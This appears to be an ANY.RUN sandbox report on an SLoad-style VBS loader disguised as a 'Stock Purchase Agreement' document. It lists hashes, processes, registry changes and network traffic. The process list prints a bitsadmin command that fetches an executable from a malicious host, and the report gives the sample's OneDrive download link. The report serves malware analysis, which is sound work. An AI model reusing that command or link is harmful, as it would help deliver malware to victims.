analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

https://onedrive.live.com/download.aspx?cid=3ABA467EDD231A24&authKey=%21AL-wPCDwG4tOkRg&resid=3ABA467EDD231A24!715&ithint=%2Ezip

Full analysis: https://app.any.run/tasks/602bc9d2-c02f-4995-bc35-04c29fe5f0d7
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 20, 2019, 20:42:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
Indicators:
MD5:

45379D58CD127DAF129F8FD7CA897B83

SHA1:

44E49F393549E1324FF1E3308F0544CA835903B7

SHA256:

725CEB10AE51A19B707B4335537475E33D8254C3ED620BE5D4A21D668B67FC3D

SSDEEP:

3:N8Ck3CTwKKfeZkkRvTeP6AcOg4h1yLgB7ukRvTeSLYUc:2CkST/KfeaYvTKrcOlCgsYvTDLYx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • WScript.exe (PID: 1520)
      • WScript.exe (PID: 2732)
  • SUSPICIOUS

    • Creates files in the program directory

      • firefox.exe (PID: 116)
    • Creates files in the user directory

      • notepad++.exe (PID: 1692)
    • Executable content was dropped or overwritten

      • firefox.exe (PID: 116)
  • INFO

    • Manual execution by user

      • WScript.exe (PID: 1520)
      • notepad++.exe (PID: 1692)
      • WScript.exe (PID: 2732)
    • Application launched itself

      • firefox.exe (PID: 116)
    • Reads CPU info

      • firefox.exe (PID: 116)
    • Creates files in the user directory

      • firefox.exe (PID: 116)
    • Reads settings of System Certificates

      • firefox.exe (PID: 116)
    • Dropped object may contain Bitcoin addresses

      • firefox.exe (PID: 116)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
14
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start firefox.exe firefox.exe no specs firefox.exe firefox.exe firefox.exe winrar.exe no specs wscript.exe no specs wmic.exe no specs bitsadmin.exe no specs notepad++.exe gup.exe wscript.exe no specs wmic.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
116"C:\Program Files\Mozilla Firefox\firefox.exe" https://onedrive.live.com/download.aspx?cid=3ABA467EDD231A24&authKey=%21AL-wPCDwG4tOkRg&resid=3ABA467EDD231A24!715&ithint=%2EzipC:\Program Files\Mozilla Firefox\firefox.exe
explorer.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Version:
65.0.2
3216"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="116.0.1160733449\661152427" -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - "C:\Users\admin\AppData\LocalLow\Mozilla\Temp-{ce348e4c-7d33-445e-89f9-60108c51bcaf}" 116 "\\.\pipe\gecko-crash-server-pipe.116" 1112 gpuC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Version:
65.0.2
3988"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="116.6.1391724568\1685732788" -childID 1 -isForBrowser -prefsHandle 796 -prefMapHandle 1548 -prefsLen 1 -prefMapSize 180950 -schedulerPrefs 0001,2 -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 116 "\\.\pipe\gecko-crash-server-pipe.116" 1292 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
65.0.2
3864"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="116.13.1889131282\59122917" -childID 2 -isForBrowser -prefsHandle 2596 -prefMapHandle 2516 -prefsLen 216 -prefMapSize 180950 -schedulerPrefs 0001,2 -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 116 "\\.\pipe\gecko-crash-server-pipe.116" 2612 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
65.0.2
296"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="116.20.1621223874\1853764551" -childID 3 -isForBrowser -prefsHandle 3272 -prefMapHandle 2436 -prefsLen 5824 -prefMapSize 180950 -schedulerPrefs 0001,2 -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 116 "\\.\pipe\gecko-crash-server-pipe.116" 3400 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
65.0.2
2164"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Stock Purchase Agreement b90.zip"C:\Program Files\WinRAR\WinRAR.exefirefox.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
1520"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Stock Purchase Agreement b90.doc.vbs" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3252wmic OS get Caption /valueC:\Windows\System32\Wbem\wmic.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3600"C:\Windows\System32\bitsadmin.exe" /transfer qcxjb7 /Priority HIGH http://qwerty.tastywieners.com/quintessential.png?bg=sp41&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av= C:\Users\admin\AppData\Local\Temp\214378183.84.exeC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149580817
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
1692"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\Stock Purchase Agreement b90.doc.vbs"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Exit code:
0
Version:
7.51
Total events
1 502
Read events
1 450
Write events
52
Delete events
0

Modification events

(PID) Process:(116) firefox.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(116) firefox.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000071000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(116) firefox.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(116) firefox.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(116) firefox.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithProgids
Operation:writeName:WinRAR.ZIP
Value:
(PID) Process:(2164) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2164) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(2164) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2164) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Stock Purchase Agreement b90.zip
(PID) Process:(2164) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
Executable files
1
Suspicious files
57
Text files
35
Unknown types
44

Dropped files

PID
Process
Filename
Type
116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\scriptCache-current.bin
MD5:
SHA256:
116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\cache2\trash1833
MD5:
SHA256:
116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs-1.js
MD5:
SHA256:
116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.tmp
MD5:
SHA256:
116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cert9.db-journal
MD5:
SHA256:
116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\urlCache-current.binbinary
MD5:2EDB16BAAB71D3A265960F122CC9A3D8
SHA256:3A3C81D31180EB9A36856792D4D6FE72FDDA61AF20DA1FEC484F1D3BDFC8B1B7
116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\cache2\entries\F3C0FF7B30182F3840CC44A99DC3D94C626D8456der
MD5:6FF60D50ADF9A64425D7E333157DCA6A
SHA256:5BA137BD399B63B2AE820146274A014AB11898A8EC3DA247EA40BC79F9636207
116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\scriptCache-child-current.binbinary
MD5:D9ED8FC36E44323FC4D590096318834E
SHA256:541A10EF812806C4A23386FFFFDCB5352B2F35E373681788774A27CB82581EE5
116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cert9.dbsqlite
MD5:F4F6E828BD945E67C81E2A041D2D2AC2
SHA256:CB0CC7542ED08F1B829165432C6C525D402D0B0DC63CFE6E26F1CF8721337877
116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.jstext
MD5:6BA0DD87A8D8DA5F9BDD3C635AA035E4
SHA256:D3AEE1EE9848245D1C41AD416BD0ED21C6CC2C4E6B991DA361443ED656FE897B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
16
TCP/UDP connections
31
DNS requests
77
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
200
192.186.224.8:80
http://qwerty.tastywieners.com/quintessential.png?bg=sp41&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
116
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
116
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
116
firefox.exe
POST
200
172.217.16.131:80
http://ocsp.pki.goog/GTSGIAG3
US
der
471 b
whitelisted
HEAD
200
192.186.224.8:80
http://qwerty.tastywieners.com/quintessential.png?bg=sp41&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
116
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
116
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
116
firefox.exe
POST
200
172.217.16.131:80
http://ocsp.pki.goog/GTSGIAG3
US
der
471 b
whitelisted
116
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
GET
200
2.21.242.197:80
http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D
NL
der
1.37 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
116
firefox.exe
52.43.79.30:443
aus5.mozilla.org
Amazon.com, Inc.
US
unknown
116
firefox.exe
52.88.179.171:443
search.services.mozilla.com
Amazon.com, Inc.
US
unknown
116
firefox.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
116
firefox.exe
2.16.106.209:80
detectportal.firefox.com
Akamai International B.V.
whitelisted
116
firefox.exe
52.84.158.143:443
snippets.cdn.mozilla.net
Amazon.com, Inc.
US
unknown
116
firefox.exe
34.209.86.85:443
tiles.services.mozilla.com
Amazon.com, Inc.
US
unknown
116
firefox.exe
13.107.42.13:443
onedrive.live.com
Microsoft Corporation
US
malicious
116
firefox.exe
13.107.42.12:443
smkgzg.bn.files.1drv.com
Microsoft Corporation
US
suspicious
116
firefox.exe
172.217.16.131:80
ocsp.pki.goog
Google Inc.
US
whitelisted
116
firefox.exe
216.58.206.10:443
safebrowsing.googleapis.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
onedrive.live.com
  • 13.107.42.13
shared
detectportal.firefox.com
  • 2.16.106.209
  • 2.16.106.152
whitelisted
aus5.mozilla.org
  • 52.43.79.30
  • 34.218.159.169
  • 34.216.134.104
  • 52.40.226.98
  • 52.32.77.100
  • 35.164.82.230
  • 34.214.241.105
  • 54.148.138.18
  • 54.244.6.221
whitelisted
balrog-aus5.r53-2.services.mozilla.com
  • 54.148.138.18
  • 34.214.241.105
  • 35.164.82.230
  • 52.32.77.100
  • 52.40.226.98
  • 34.216.134.104
  • 34.218.159.169
  • 52.43.79.30
  • 54.244.6.221
whitelisted
l-0004.l-msedge.net
  • 13.107.42.13
whitelisted
a1089.dscd.akamai.net
  • 2.16.106.152
  • 2.16.106.209
whitelisted
search.services.mozilla.com
  • 52.88.179.171
  • 52.27.173.161
  • 52.10.97.252
whitelisted
search.r53-2.services.mozilla.com
  • 52.10.97.252
  • 52.27.173.161
  • 52.88.179.171
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
cs9.wac.phicdn.net
  • 93.184.220.29
whitelisted

Threats

PID
Process
Class
Message
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.VBS.SLoad.gen
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.VBS.SLoad.gen
4 ETPRO signatures available at the full report
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
42C4C5846BB675C74E2B2C90C69AB44366401093